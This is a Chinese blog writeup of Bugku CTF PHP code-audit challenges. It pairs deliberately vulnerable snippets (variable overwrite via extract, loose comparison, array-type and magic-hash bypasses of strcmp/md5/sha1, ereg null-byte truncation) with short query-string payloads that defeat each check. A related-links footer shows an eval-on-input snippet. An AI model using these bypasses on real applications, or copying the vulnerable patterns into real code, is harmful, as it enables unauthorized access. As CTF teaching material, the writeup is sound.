Bugku-代码审计-writeup

最新推荐文章于 2023-01-13 23:04:29 发布
最新推荐文章于 2023-01-13 23:04:29 发布
阅读量290 收藏 1
点赞数
分类专栏: Bugku刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45628145/article/details/107293039
版权

extract变量覆盖

<?php
    $flag='xxx';
    extract($_GET);
    if(isset($shiyan)) {
        $content=trim(file_get_contents($flag));
        if($shiyan==$content) {
            echo'flag{xxx}';
        }
        else {
            echo'Oh.no';
        }
    }
?>

覆盖掉xxx,payload

?shiyan=&flag=

strcmp比较字符串

<?php
	$flag = "flag{xxxxx}";
	if (isset($_GET['a'])) {
		if (strcmp($_GET['a'], $flag) == 0)
			die('Flag: '.$flag);
		else
	print 'No';
	}
?>

strcmp函数处理的是字符串,当接受到了不符合的类型,会发生错误,而在5.3之前的php中,显示了报错的警告信息后,将return 0,于是传入数组即可,payload

?a[]=1

urldecode二次编码绕过

<?php
	if(eregi("hackerDJ",$_GET[id])) {
		echo("not allowed!");
		exit();
	}
	$_GET[id] = urldecode($_GET[id]);
	if($_GET[id] == "hackerDJ") {
		echo "Access granted!";
		echo "flag";
	}
?>

解法即如提名所说,payload

?id=%2568%2561%2563%256b%2565%2572%2544%254a

md5()函数

<?php
	error_reporting(0);
	$flag = 'flag{test}';
	if (isset($_GET['username']) and isset($_GET['password'])) {
		if ($_GET['username'] == $_GET['password'])
		print 'Your password can not be your username.';
		else if (md5($_GET['username']) === md5($_GET['password']))
				die('Flag: '.$flag);
			 else
				print 'Invalid password';
	}
?>

构造数组绕过,payload

?username[]=1&password[]=2

数组返回NULL绕过

<?php
	$flag = "flag";
	if (isset ($_GET['password'])) {
	if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
		echo 'You password must be alphanumeric';
	else if (strpos ($_GET['password'], '--') !== FALSE)
			 die('Flag: ' . $flag);
		 else
		 	 echo 'Invalid password';
}
?>

解法也是如题名所说了,payload

?password[]=1

弱类型整数大小比较绕过

<?php
	$temp = $_GET['password'];
	is_numeric($temp)?die("no numeric"):NULL;
	if($temp>1336){
		echo $flag;
	}
?>

弱类型比较、payload

?password=1337a

sha()函数比较绕过

<?php
$flag = "flag";
	if (isset($_GET['name']) and isset($_GET['password'])){
		var_dump($_GET['name']);
		echo "";
		var_dump($_GET['password']);
		var_dump(sha1($_GET['name']));
		var_dump(sha1($_GET['password']));
		if ($_GET['name'] == $_GET['password'])
			echo 'Your password can not be your name!';
		else if (sha1($_GET['name']) === sha1($_GET['password']))
				die('Flag: '.$flag);
		 	 else
				echo 'Invalid password.';
	}else
		echo 'Login first!';
?>

数组绕过,payload

?name[]=1&password[]=2

md5加密相等绕过

<?php
	$md51 = md5('QNKCDZO');
	$a = @$_GET['a'];
	$md52 = @md5($a);
	if(isset($a)){
		if ($a != 'QNKCDZO' && $md51 == $md52) {
		echo "flag{*}";
	} else {
		echo "false!!!";
	}}
	else{echo "please input a";}
?>

经典题目了,payload

?a=s878926199a

十六进制与数字比较

<?php
	error_reporting(0);
	function noother_says_correct($temp)
	{
		$flag = 'flag{test}';
		$one = ord('1');
		$nine = ord('9');
		$number = '3735929054';
		for ($i = 0; $i < strlen($number); $i++)
		{
			$digit = ord($temp{$i});
			if ( ($digit >= $one) && ($digit <= $nine) )
			这里是不能存在1-9之间的数字
			{
				return "flase";
			}
		}
		if($number == $temp)
		而这里又要相等,矛盾了,因此构造16进制进行绕过,php在判断相等时会自己进行转换
			return $flag;
	}
	$temp = $_GET['password'];
	echo noother_says_correct($temp);
?>

payload

?password=0xdeadc0de

ereg正则%00截断

<?php
	$flag = "xxx";
	if (isset ($_GET['password']))
	{
		if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
			echo 'You password must be alphanumeric';
		else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
				if (strpos ($_GET['password'], '-') !== FALSE) //strpos — 查找字符串首次出现的位置
					die('Flag: ' . $flag);
				else
					echo('- have not been found');
			 else
				echo 'Invalid password';
	}
}
?>

strlen($_GET['password']) < 8 && $_GET['password'] > 9999999这个可以通过构造1e8进行绕过,而正则可以通过数组绕过或者%00截断,所以有两种解法,但是这样构造payload的时候题目没有显示flag

搞不懂为什么有个*-*,但理论上应该没问题,后面再看看是什么原因
第二种就是这样的了

strpos数组绕过

<?php
	$flag = "flag";
	if (isset ($_GET['ctf'])) {
		if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE)
			echo '必须输入数字才行';
		else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE)
				 die('Flag: '.$flag);
			 else
				 echo '骚年,继续努力吧啊~';
}
?>

解题思路也即如题名所说,payload

?ctf[]=#biubiubiu

数字验证正则绕过

<?php
	error_reporting(0);
	$flag = 'flag{test}';
	if ("POST" == $_SERVER['REQUEST_METHOD'])
	{
		$password = $_POST['password'];
		if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password))
		正则:输入的内容必须为12个以上,不包括空格和tab键
		{
			echo 'flag';
			exit;
		}
		while (TRUE)
		{
			$reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/';
			[[:punct:]] 任何标点符号 [[:digit:]] 任何数字 [[:upper:]] 任何大写字母 [[:lower:]] 任何小写字母
			if (6 > preg_match_all($reg, $password, $arr))
				break;
			$c = 0;
			$ps = array('punct', 'digit', 'upper', 'lower'); 
			foreach ($ps as $pt)
			{
				if (preg_match("/[[:$pt:]]+/", $password))
				$c += 1;
			}
			if ($c < 3) break;
			//>=3,必须包含四种类型三种与三种以上
			if ("42" == $password) echo $flag;
			else echo 'Wrong password';
			exit;
		}
	}
?>

绕过第一个if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password))即可,即发送password的长度为12个以下,即可绕过

秋风瑟瑟...
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone ...cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 ... 面向返
PHP代码审计系列(一)
tpaer的博客
12-04 990
本系列将收集多个PHP代码安全审计项目从易到难,并加入个人详细的源码解读。此系列将进行持续更新。
php_bugs(php代码审计基础)
筱阳的博客
03-16 1117
前言 以下都是以下代码审计的一些基础漏洞,适合新手学习~ extract 变量覆盖 extract(array,extract_rules,prefix) 该函数使用数组键名作为变量名,使用数组键值作为变量值。但是当变量中有同名的元素时,该函数默认将原有的值给覆盖掉。这就造成了变量覆盖漏洞。 &lt;?php $flag='xxx'; extract($_GET); if(isset($shi...
php error_reporting()关闭报错
weixin_33725515的博客
07-09 498
错误报告级别:指定了在什么情况下,脚本代码中的错误(这里的错误是广义的错误,包括E_NOTICE注意、E_WARNING警告、E_ERROR致命错误等)会以错误报告的形式输出。 一、常用设置说明 error_reporting(-1); 表示显示所有PHP错误报告,包括将来PHP加入的新的错误级别。 至PHP5.4,E_ALL有同样的行为...
[CTFSHOW]命令执行
热门推荐
Y4tacker的博客
11-20 1万+
文章目录web 29web 30web 31web32web40参考文章 web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 我这里只想到五种简便的方法: 通配符 payload1:c=syst
CTF入门_sha1
m0_46203901的博客
09-08 1494
sha1的相等,非对称加密
ifa-ctf-writeup
03-17
ifa-ctf-writeup
writeup-开源
05-13
用于将源文档转换为HTML或XML的编程语言。 Writeup是标记语言(类似于markdown)和宏预处理语言的组合,该宏语言可以为文档建立正式的生产系统。
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
bugkctf 代码审计
灰太的表格的博客
04-01 323
extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 因为extract()会把符...
php黑魔法
qq_44005305的博客
01-13 360
这个代码是关于switch的小bug,比如让我们包含当前目录中的flag.php,给which为flag,这里会发现在case 0和case 1的时候,没有break,按照常规思维,应该是0比较不成功,进入比较1,然后比较2,再然后进入default,但是事实却不是这样,事实上,在 case 0的时候,字符串和0比较是相等的,进入了case 0的方法体,但是却没有break,这个时候,默认判断已经比较成功了,而如果匹配成功之后,会继续执行后面的语句,这个时候,是不会再继续进行任何判断的。
CTF平台题库writeup(四)--BugKuCTF-代码审计(14题详解)
渗透、攻防、CTF、编程
07-04 4311
1、extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 知识点: 变量覆盖 file_get_contents():将整个文件读入一个字符串 trim()去除字符串两侧的空格或者指定
CTF php代码审计 strpos()函数漏洞 XXE漏洞xinclude()
baynk的博客
03-21 3060
这个题之间弄了好一会,都没搞出来,一直没时间,今天下定决定把它做出来!!! <?php highlight_file(__FILE__); class Login { public function __construct($user, $pass) { $this->loginViaXml($user, $pass); } ...
18年护网杯 Easy Laravel Writeup
Tel_milk的博客
11-22 959
2018护网杯Easy Laravel Writeup,CTF平台攻防世界,难度10
CTF之代码审计汇总
D-R0s1的博客
10-08 7045
  最近在做bugku代码审计的题目,发现了web题目中存在着大量的php漏洞以及弱类型函数的绕过问题,现在借着bugku中的题目来统一的整理一下。希望通过整理可以温故而知新。 第一题:extract变量覆盖 焦点:extract($_GET) &lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(fi...
高级PHP应用程序漏洞审核技术
王意林的专栏
10-27 7983
by: 80vul.com 目录  [隐藏] 1 前言2 传统的代码审计技术3 PHP版本与应用代码审计4 其他的因素与应用代码审计5 扩展我们的字典 5.1 变量本身的key5.2 变量覆盖 5.2.1 遍历初始化变量5.2.2 parse_str()变量覆盖漏洞5.2.3 import_request_variables()变量覆盖漏洞
【CSRF技巧拓展】————5、浅谈Session机制及CSRF攻防
Fly_鹏程万里
01-23 1191
在讲解CSRF攻击原理及流程之前,我想先花点时间讲讲浏览器信息传递中的Session机制。 Session机制 Session,中文意思是“会话”。对于“会话”我的理解是客户端与服务端间通信的一种方式,也可以简单的理解为一个用户从打开浏览器开始,访问一个web网站,点击某些超链接,访问某些服务端的资源,然后关闭浏览器的这一整个过程就是一次会话。   早期,客户端与服务端之间的每次信息传递都是...
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1581
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值